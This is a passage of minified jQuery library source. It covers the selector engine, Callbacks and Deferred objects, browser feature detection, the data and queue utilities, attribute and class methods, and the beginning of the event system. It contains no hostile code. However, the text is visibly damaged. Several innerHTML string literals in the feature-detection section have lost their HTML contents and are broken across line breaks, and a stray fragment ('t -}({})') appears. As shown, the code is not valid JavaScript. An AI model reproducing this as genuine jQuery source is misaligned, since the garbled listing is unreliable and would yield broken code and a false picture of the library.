o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:lt(function(e){return function(t){return at(e,t).length>0}}),contains:lt(function(e){return function(t){return(t.textContent||t.innerText||a(t)).indexOf(e)>-1}}),lang:lt(function(e){return G.test(e||"")||at.error("unsupported lang: "+e),e=e.replace(rt,it).toLowerCase(),function(t){var n;do if(n=h?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===d},focus:function(e){return e===f.activeElement&&(!f.hasFocus||f.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return 
e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!o.pseudos.empty(e)},header:function(e){return tt.test(e.nodeName)},input:function(e){return et.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:ht(function(){return[0]}),last:ht(function(e,t){return[t-1]}),eq:ht(function(e,t,n){return[0>n?n+t:n]}),even:ht(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:ht(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:ht(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:ht(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);return e})}},o.pseudos.nth=o.pseudos.eq;for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})o.pseudos[n]=ft(n);for(n in{submit:!0,reset:!0})o.pseudos[n]=dt(n);function gt(){}gt.prototype=o.filters=o.pseudos,o.setFilters=new gt;function mt(e,t){var n,r,i,a,s,l,u,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,l=[],u=o.preFilter;while(s){(!n||(r=X.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),l.push(i=[])),n=!1,(r=U.exec(s))&&(n=r.shift(),i.push({value:n,type:r[0].replace(z," ")}),s=s.slice(n.length));for(a in o.filter)!(r=Q[a].exec(s))||u[a]&&!(r=u[a](r))||(n=r.shift(),i.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?at.error(e):k(e,l).slice(0)}function yt(e){var t=0,n=e.length,r="";for(;n>t;t++)r+=e[t].value;return r}function vt(e,t,n){var r=t.dir,o=n&&"parentNode"===r,a=C++;return 
t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||o)return e(t,n,i)}:function(t,n,s){var l,u,c,p=T+" "+a;if(s){while(t=t[r])if((1===t.nodeType||o)&&e(t,n,s))return!0}else while(t=t[r])if(1===t.nodeType||o)if(c=t[b]||(t[b]={}),(u=c[r])&&u[0]===p){if((l=u[1])===!0||l===i)return l===!0}else if(u=c[r]=[p],u[1]=e(t,n,s)||i,u[1]===!0)return!0}}function bt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function xt(e,t,n,r,i){var o,a=[],s=0,l=e.length,u=null!=t;for(;l>s;s++)(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),u&&t.push(s));return a}function wt(e,t,n,r,i,o){return r&&!r[b]&&(r=wt(r)),i&&!i[b]&&(i=wt(i,o)),lt(function(o,a,s,l){var u,c,p,f=[],d=[],h=a.length,g=o||Nt(t||"*",s.nodeType?[s]:s,[]),m=!e||!o&&t?g:xt(g,f,e,s,l),y=n?i||(o?e:h||r)?[]:a:m;if(n&&n(m,y,s,l),r){u=xt(y,d),r(u,[],s,l),c=u.length;while(c--)(p=u[c])&&(y[d[c]]=!(m[d[c]]=p))}if(o){if(i||e){if(i){u=[],c=y.length;while(c--)(p=y[c])&&u.push(m[c]=p);i(null,y=[],u,l)}c=y.length;while(c--)(p=y[c])&&(u=i?F.call(o,p):f[c])>-1&&(o[u]=!(a[u]=p))}}else y=xt(y===a?y.splice(h,y.length):y),i?i(null,a,y,l):M.apply(a,y)})}function Tt(e){var t,n,r,i=e.length,a=o.relative[e[0].type],s=a||o.relative[" "],l=a?1:0,c=vt(function(e){return e===t},s,!0),p=vt(function(e){return F.call(t,e)>-1},s,!0),f=[function(e,n,r){return!a&&(r||n!==u)||((t=n).nodeType?c(e,n,r):p(e,n,r))}];for(;i>l;l++)if(n=o.relative[e[l].type])f=[vt(bt(f),n)];else{if(n=o.filter[e[l].type].apply(null,e[l].matches),n[b]){for(r=++l;i>r;r++)if(o.relative[e[r].type])break;return wt(l>1&&bt(f),l>1&&yt(e.slice(0,l-1).concat({value:" "===e[l-2].type?"*":""})).replace(z,"$1"),n,r>l&&Tt(e.slice(l,r)),i>r&&Tt(e=e.slice(r)),i>r&&yt(e))}f.push(n)}return bt(f)}function Ct(e,t){var n=0,r=t.length>0,a=e.length>0,s=function(s,l,c,p,d){var 
h,g,m,y=[],v=0,b="0",x=s&&[],w=null!=d,C=u,N=s||a&&o.find.TAG("*",d&&l.parentNode||l),k=T+=null==C?1:Math.random()||.1;for(w&&(u=l!==f&&l,i=n);null!=(h=N[b]);b++){if(a&&h){g=0;while(m=e[g++])if(m(h,l,c)){p.push(h);break}w&&(T=k,i=++n)}r&&((h=!m&&h)&&v--,s&&x.push(h))}if(v+=b,r&&b!==v){g=0;while(m=t[g++])m(x,y,l,c);if(s){if(v>0)while(b--)x[b]||y[b]||(y[b]=q.call(p));y=xt(y)}M.apply(p,y),w&&!s&&y.length>0&&v+t.length>1&&at.uniqueSort(p)}return w&&(T=k,u=C),x};return r?lt(s):s}l=at.compile=function(e,t){var n,r=[],i=[],o=E[e+" "];if(!o){t||(t=mt(e)),n=t.length;while(n--)o=Tt(t[n]),o[b]?r.push(o):i.push(o);o=E(e,Ct(i,r))}return o};function Nt(e,t,n){var r=0,i=t.length;for(;i>r;r++)at(e,t[r],n);return n}function kt(e,t,n,i){var a,s,u,c,p,f=mt(e);if(!i&&1===f.length){if(s=f[0]=f[0].slice(0),s.length>2&&"ID"===(u=s[0]).type&&r.getById&&9===t.nodeType&&h&&o.relative[s[1].type]){if(t=(o.find.ID(u.matches[0].replace(rt,it),t)||[])[0],!t)return n;e=e.slice(s.shift().value.length)}a=Q.needsContext.test(e)?0:s.length;while(a--){if(u=s[a],o.relative[c=u.type])break;if((p=o.find[c])&&(i=p(u.matches[0].replace(rt,it),V.test(s[0].type)&&t.parentNode||t))){if(s.splice(a,1),e=i.length&&yt(s),!e)return M.apply(n,i),n;break}}}return l(e,f)(i,t,!h,n,V.test(e)),n}r.sortStable=b.split("").sort(A).join("")===b,r.detectDuplicates=S,p(),r.sortDetached=ut(function(e){return 1&e.compareDocumentPosition(f.createElement("div"))}),ut(function(e){return e.innerHTML="","#"===e.firstChild.getAttribute("href")})||ct("type|href|height|width",function(e,n,r){return r?t:e.getAttribute(n,"type"===n.toLowerCase()?1:2)}),r.attributes&&ut(function(e){return e.innerHTML="",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||ct("value",function(e,n,r){return r||"input"!==e.nodeName.toLowerCase()?t:e.defaultValue}),ut(function(e){return null==e.getAttribute("disabled")})||ct(B,function(e,n,r){var i;return 
r?t:(i=e.getAttributeNode(n))&&i.specified?i.value:e[n]===!0?n.toLowerCase():null}),x.find=at,x.expr=at.selectors,x.expr[":"]=x.expr.pseudos,x.unique=at.uniqueSort,x.text=at.getText,x.isXMLDoc=at.isXML,x.contains=at.contains}(e);var O={};function F(e){var t=O[e]={};return x.each(e.match(T)||[],function(e,n){t[n]=!0}),t}x.Callbacks=function(e){e="string"==typeof e?O[e]||F(e):x.extend({},e);var n,r,i,o,a,s,l=[],u=!e.once&&[],c=function(t){for(r=e.memory&&t,i=!0,a=s||0,s=0,o=l.length,n=!0;l&&o>a;a++)if(l[a].apply(t[0],t[1])===!1&&e.stopOnFalse){r=!1;break}n=!1,l&&(u?u.length&&c(u.shift()):r?l=[]:p.disable())},p={add:function(){if(l){var t=l.length;(function i(t){x.each(t,function(t,n){var r=x.type(n);"function"===r?e.unique&&p.has(n)||l.push(n):n&&n.length&&"string"!==r&&i(n)})})(arguments),n?o=l.length:r&&(s=t,c(r))}return this},remove:function(){return l&&x.each(arguments,function(e,t){var r;while((r=x.inArray(t,l,r))>-1)l.splice(r,1),n&&(o>=r&&o--,a>=r&&a--)}),this},has:function(e){return e?x.inArray(e,l)>-1:!(!l||!l.length)},empty:function(){return l=[],o=0,this},disable:function(){return l=u=r=t,this},disabled:function(){return!l},lock:function(){return u=t,r||p.disable(),this},locked:function(){return!u},fireWith:function(e,t){return!l||i&&!u||(t=t||[],t=[e,t.slice?t.slice():t],n?u.push(t):c(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},x.extend({Deferred:function(e){var t=[["resolve","done",x.Callbacks("once memory"),"resolved"],["reject","fail",x.Callbacks("once memory"),"rejected"],["notify","progress",x.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return x.Deferred(function(n){x.each(t,function(t,o){var a=o[0],s=x.isFunction(e[t])&&e[t];i[o[1]](function(){var 
e=s&&s.apply(this,arguments);e&&x.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a+"With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?x.extend(e,r):r}},i={};return r.pipe=r.then,x.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return i[o[0]+"With"](this===i?r:this,arguments),this},i[o[0]+"With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=g.call(arguments),r=n.length,i=1!==r||e&&x.isFunction(e.promise)?r:0,o=1===i?e:x.Deferred(),a=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?g.call(arguments):r,n===s?o.notifyWith(t,n):--i||o.resolveWith(t,n)}},s,l,u;if(r>1)for(s=Array(r),l=Array(r),u=Array(r);r>t;t++)n[t]&&x.isFunction(n[t].promise)?n[t].promise().done(a(t,u,n)).fail(o.reject).progress(a(t,l,s)):--i;return i||o.resolveWith(u,n),o.promise()}}),x.support=function(t){var n,r,o,s,l,u,c,p,f,d=a.createElement("div");if(d.setAttribute("className","t"),d.innerHTML="
a",n=d.getElementsByTagName("*")||[],r=d.getElementsByTagName("a")[0],!r||!r.style||!n.length)return t;s=a.createElement("select"),u=s.appendChild(a.createElement("option")),o=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t.getSetAttribute="t"!==d.className,t.leadingWhitespace=3===d.firstChild.nodeType,t.tbody=!d.getElementsByTagName("tbody").length,t.htmlSerialize=!!d.getElementsByTagName("link").length,t.style=/top/.test(r.getAttribute("style")),t.hrefNormalized="/a"===r.getAttribute("href"),t.opacity=/^0.5/.test(r.style.opacity),t.cssFloat=!!r.style.cssFloat,t.checkOn=!!o.value,t.optSelected=u.selected,t.enctype=!!a.createElement("form").enctype,t.html5Clone="<:nav>"!==a.createElement("nav").cloneNode(!0).outerHTML,t.inlineBlockNeedsLayout=!1,t.shrinkWrapBlocks=!1,t.pixelPosition=!1,t.deleteExpando=!0,t.noCloneEvent=!0,t.reliableMarginRight=!0,t.boxSizingReliable=!0,o.checked=!0,t.noCloneChecked=o.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!u.disabled;try{delete d.test}catch(h){t.deleteExpando=!1}o=a.createElement("input"),o.setAttribute("value",""),t.input=""===o.getAttribute("value"),o.value="t",o.setAttribute("type","radio"),t.radioValue="t"===o.value,o.setAttribute("checked","t"),o.setAttribute("name","t"),l=a.createDocumentFragment(),l.appendChild(o),t.appendChecked=o.checked,t.checkClone=l.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip;for(f in x(t))break;return t.ownLast="0"!==f,x(function(){var 
n,r,o,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",l=a.getElementsByTagName("body")[0];l&&(n=a.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",l.appendChild(n).appendChild(d),d.innerHTML="
t
",o=d.getElementsByTagName("td"),o[0].style.cssText="padding:0;margin:0;border:0;display:none",p=0===o[0].offsetHeight,o[0].style.display="",o[1].style.display="none",t.reliableHiddenOffsets=p&&0===o[0].offsetHeight,d.innerHTML="",d.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",x.swap(l,null!=l.style.zoom?{zoom:1}:{},function(){t.boxSizing=4===d.offsetWidth}),e.getComputedStyle&&(t.pixelPosition="1%"!==(e.getComputedStyle(d,null)||{}).top,t.boxSizingReliable="4px"===(e.getComputedStyle(d,null)||{width:"4px"}).width,r=d.appendChild(a.createElement("div")),r.style.cssText=d.style.cssText=s,r.style.marginRight=r.style.width="0",d.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),typeof d.style.zoom!==i&&(d.innerHTML="",d.style.cssText=s+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=3===d.offsetWidth,d.style.display="block",d.innerHTML="
",d.firstChild.style.width="5px",t.shrinkWrapBlocks=3!==d.offsetWidth,t.inlineBlockNeedsLayout&&(l.style.zoom=1)),l.removeChild(n),n=d=o=r=null)}),n=s=l=u=r=o=null,t -}({});var B=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;function R(e,n,r,i){if(x.acceptData(e)){var o,a,s=x.expando,l=e.nodeType,u=l?x.cache:e,c=l?e[s]:e[s]&&s;if(c&&u[c]&&(i||u[c].data)||r!==t||"string"!=typeof n)return c||(c=l?e[s]=p.pop()||x.guid++:s),u[c]||(u[c]=l?{}:{toJSON:x.noop}),("object"==typeof n||"function"==typeof n)&&(i?u[c]=x.extend(u[c],n):u[c].data=x.extend(u[c].data,n)),a=u[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[x.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=a[x.camelCase(n)])):o=a,o}}function W(e,t,n){if(x.acceptData(e)){var r,i,o=e.nodeType,a=o?x.cache:e,s=o?e[x.expando]:x.expando;if(a[s]){if(t&&(r=n?a[s]:a[s].data)){x.isArray(t)?t=t.concat(x.map(t,x.camelCase)):t in r?t=[t]:(t=x.camelCase(t),t=t in r?[t]:t.split(" ")),i=t.length;while(i--)delete r[t[i]];if(n?!I(r):!x.isEmptyObject(r))return}(n||(delete a[s].data,I(a[s])))&&(o?x.cleanData([e],!0):x.support.deleteExpando||a!=a.window?delete a[s]:a[s]=null)}}}x.extend({cache:{},noData:{applet:!0,embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(e){return e=e.nodeType?x.cache[e[x.expando]]:e[x.expando],!!e&&!I(e)},data:function(e,t,n){return R(e,t,n)},removeData:function(e,t){return W(e,t)},_data:function(e,t,n){return R(e,t,n,!0)},_removeData:function(e,t){return W(e,t,!0)},acceptData:function(e){if(e.nodeType&&1!==e.nodeType&&9!==e.nodeType)return!1;var t=e.nodeName&&x.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),x.fn.extend({data:function(e,n){var r,i,o=null,a=0,s=this[0];if(e===t){if(this.length&&(o=x.data(s),1===s.nodeType&&!x._data(s,"parsedAttrs"))){for(r=s.attributes;r.length>a;a++)i=r[a].name,0===i.indexOf("data-")&&(i=x.camelCase(i.slice(5)),$(s,i,o[i]));x._data(s,"parsedAttrs",!0)}return o}return"object"==typeof 
e?this.each(function(){x.data(this,e)}):arguments.length>1?this.each(function(){x.data(this,e,n)}):s?$(s,e,x.data(s,e)):null},removeData:function(e){return this.each(function(){x.removeData(this,e)})}});function $(e,n,r){if(r===t&&1===e.nodeType){var i="data-"+n.replace(P,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null:+r+""===r?+r:B.test(r)?x.parseJSON(r):r}catch(o){}x.data(e,n,r)}else r=t}return r}function I(e){var t;for(t in e)if(("data"!==t||!x.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}x.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=x._data(e,n),r&&(!i||x.isArray(r)?i=x._data(e,n,x.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=x.queue(e,t),r=n.length,i=n.shift(),o=x._queueHooks(e,t),a=function(){x.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return x._data(e,n)||x._data(e,n,{empty:x.Callbacks("once memory").add(function(){x._removeData(e,t+"queue"),x._removeData(e,n)})})}}),x.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?x.queue(this[0],e):n===t?this:this.each(function(){var t=x.queue(this,e,n);x._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&x.dequeue(this,e)})},dequeue:function(e){return this.each(function(){x.dequeue(this,e)})},delay:function(e,t){return e=x.fx?x.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=x.Deferred(),a=this,s=this.length,l=function(){--i||o.resolveWith(a,[a])};"string"!=typeof e&&(n=e,e=t),e=e||"fx";while(s--)r=x._data(a[s],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(l));return l(),o.promise(n)}});var 
z,X,U=/[\t\r\n\f]/g,V=/\r/g,Y=/^(?:input|select|textarea|button|object)$/i,J=/^(?:a|area)$/i,G=/^(?:checked|selected)$/i,Q=x.support.getSetAttribute,K=x.support.input;x.fn.extend({attr:function(e,t){return x.access(this,x.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){x.removeAttr(this,e)})},prop:function(e,t){return x.access(this,x.prop,e,t,arguments.length>1)},removeProp:function(e){return e=x.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,l="string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).addClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):" ")){o=0;while(i=t[o++])0>r.indexOf(" "+i+" ")&&(r+=i+" ");n.className=x.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,l=0===arguments.length||"string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).removeClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):"")){o=0;while(i=t[o++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?x.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e;return"boolean"==typeof t&&"string"===n?t?this.addClass(e):this.removeClass(e):x.isFunction(e)?this.each(function(n){x(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n){var t,r=0,o=x(this),a=e.match(T)||[];while(t=a[r++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else(n===i||"boolean"===n)&&(this.className&&x._data(this,"__className__",this.className),this.className=this.className||e===!1?"":x._data(this,"__className__")||"")})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;r>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(U," 
").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=x.isFunction(e),this.each(function(n){var o;1===this.nodeType&&(o=i?e.call(this,n,x(this).val()):e,null==o?o="":"number"==typeof o?o+="":x.isArray(o)&&(o=x.map(o,function(e){return null==e?"":e+""})),r=x.valHooks[this.type]||x.valHooks[this.nodeName.toLowerCase()],r&&"set"in r&&r.set(this,o,"value")!==t||(this.value=o))});if(o)return r=x.valHooks[o.type]||x.valHooks[o.nodeName.toLowerCase()],r&&"get"in r&&(n=r.get(o,"value"))!==t?n:(n=o.value,"string"==typeof n?n.replace(V,""):null==n?"":n)}}}),x.extend({valHooks:{option:{get:function(e){var t=x.find.attr(e,"value");return null!=t?t:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i+1:r.length,l=0>i?s:o?i:0;for(;s>l;l++)if(n=r[l],!(!n.selected&&l!==i||(x.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&x.nodeName(n.parentNode,"optgroup"))){if(t=x(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n,r,i=e.options,o=x.makeArray(t),a=i.length;while(a--)r=i[a],(r.selected=x.inArray(x(r).val(),o)>=0)&&(n=!0);return n||(e.selectedIndex=-1),o}}},attr:function(e,n,r){var o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return typeof e.getAttribute===i?x.prop(e,n,r):(1===s&&x.isXMLDoc(e)||(n=n.toLowerCase(),o=x.attrHooks[n]||(x.expr.match.bool.test(n)?X:z)),r===t?o&&"get"in o&&null!==(a=o.get(e,n))?a:(a=x.find.attr(e,n),null==a?t:a):null!==r?o&&"set"in o&&(a=o.set(e,r,n))!==t?a:(e.setAttribute(n,r+""),r):(x.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(T);if(o&&1===e.nodeType)while(n=o[i++])r=x.propFix[n]||n,x.expr.match.bool.test(n)?K&&Q||!G.test(n)?e[r]=!1:e[x.camelCase("default-"+n)]=e[r]=!1:x.attr(e,n,""),e.removeAttribute(Q?n:r)},attrHooks:{type:{set:function(e,t){if(!x.support.radioValue&&"radio"===t&&x.nodeName(e,"input")){var n=e.value;return 
e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{"for":"htmlFor","class":"className"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!x.isXMLDoc(e),a&&(n=x.propFix[n]||n,o=x.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var t=x.find.attr(e,"tabindex");return t?parseInt(t,10):Y.test(e.nodeName)||J.test(e.nodeName)&&e.href?0:-1}}}}),X={set:function(e,t,n){return t===!1?x.removeAttr(e,n):K&&Q||!G.test(n)?e.setAttribute(!Q&&x.propFix[n]||n,n):e[x.camelCase("default-"+n)]=e[n]=!0,n}},x.each(x.expr.match.bool.source.match(/\w+/g),function(e,n){var r=x.expr.attrHandle[n]||x.find.attr;x.expr.attrHandle[n]=K&&Q||!G.test(n)?function(e,n,i){var o=x.expr.attrHandle[n],a=i?t:(x.expr.attrHandle[n]=t)!=r(e,n,i)?n.toLowerCase():null;return x.expr.attrHandle[n]=o,a}:function(e,n,r){return r?t:e[x.camelCase("default-"+n)]?n.toLowerCase():null}}),K&&Q||(x.attrHooks.value={set:function(e,n,r){return x.nodeName(e,"input")?(e.defaultValue=n,t):z&&z.set(e,n,r)}}),Q||(z={set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n+="","value"===r||n===e.getAttribute(r)?n:t}},x.expr.attrHandle.id=x.expr.attrHandle.name=x.expr.attrHandle.coords=function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&""!==i.value?i.value:null},x.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&r.specified?r.value:t},set:z.set},x.attrHooks.contenteditable={set:function(e,t,n){z.set(e,""===t?!1:t,n)}},x.each(["width","height"],function(e,n){x.attrHooks[n]={set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}}})),x.support.hrefNormalized||x.each(["href","src"],function(e,t){x.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}}),x.support.style||(x.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return 
e.style.cssText=t+""}}),x.support.optSelected||(x.propHooks.selected={get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}}),x.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){x.propFix[this.toLowerCase()]=this}),x.support.enctype||(x.propFix.enctype="encoding"),x.each(["radio","checkbox"],function(){x.valHooks[this]={set:function(e,n){return x.isArray(n)?e.checked=x.inArray(x(e).val(),n)>=0:t}},x.support.checkOn||(x.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})});var Z=/^(?:input|select|textarea)$/i,et=/^key/,tt=/^(?:mouse|contextmenu)|click/,nt=/^(?:focusinfocus|focusoutblur)$/,rt=/^([^.]*)(?:\.(.+)|)$/;function it(){return!0}function ot(){return!1}function at(){try{return a.activeElement}catch(e){}}x.event={global:{},add:function(e,n,r,o,a){var s,l,u,c,p,f,d,h,g,m,y,v=x._data(e);if(v){r.handler&&(c=r,r=c.handler,a=c.selector),r.guid||(r.guid=x.guid++),(l=v.events)||(l=v.events={}),(f=v.handle)||(f=v.handle=function(e){return typeof x===i||e&&x.event.triggered===e.type?t:x.event.dispatch.apply(f.elem,arguments)},f.elem=e),n=(n||"").match(T)||[""],u=n.length;while(u--)s=rt.exec(n[u])||[],g=y=s[1],m=(s[2]||"").split(".").sort(),g&&(p=x.event.special[g]||{},g=(a?p.delegateType:p.bindType)||g,p=x.event.special[g]||{},d=x.extend({type:g,origType:y,data:o,handler:r,guid:r.guid,selector:a,needsContext:a&&x.expr.match.needsContext.test(a),namespace:m.join(".")},c),(h=l[g])||(h=l[g]=[],h.delegateCount=0,p.setup&&p.setup.call(e,o,m,f)!==!1||(e.addEventListener?e.addEventListener(g,f,!1):e.attachEvent&&e.attachEvent("on"+g,f))),p.add&&(p.add.call(e,d),d.handler.guid||(d.handler.guid=r.guid)),a?h.splice(h.delegateCount++,0,d):h.push(d),x.event.global[g]=!0);e=null}},remove:function(e,t,n,r,i){var 
o,a,s,l,u,c,p,f,d,h,g,m=x.hasData(e)&&x._data(e);if(m&&(c=m.events)){t=(t||"").match(T)||[""],u=t.length;while(u--)if(s=rt.exec(t[u])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){p=x.event.special[d]||{},d=(r?p.delegateType:p.bindType)||d,f=c[d]||[],s=s[2]&&RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),l=o=f.length;while(o--)a=f[o],!i&&g!==a.origType||n&&n.guid!==a.guid||s&&!s.test(a.namespace)||r&&r!==a.selector&&("**"!==r||!a.selector)||(f.splice(o,1),a.selector&&f.delegateCount--,p.remove&&p.remove.call(e,a));l&&!f.length&&(p.teardown&&p.teardown.call(e,h,m.handle)!==!1||x.removeEvent(e,d,m.handle),delete c[d])}else for(d in c)x.event.remove(e,d+t[u],n,r,!0);x.isEmptyObject(c)&&(delete m.handle,x._removeData(e,"events"))}},trigger:function(n,r,i,o){var s,l,u,c,p,f,d,h=[i||a],g=v.call(n,"type")?n.type:n,m=v.call(n,"namespace")?n.namespace.split("."):[];if(u=f=i=i||a,3!==i.nodeType&&8!==i.nodeType&&!nt.test(g+x.event.triggered)&&(g.indexOf(".")>=0&&(m=g.split("."),g=m.shift(),m.sort()),l=0>g.indexOf(":")&&"on"+g,n=n[x.expando]?n:new x.Event(g,"object"==typeof 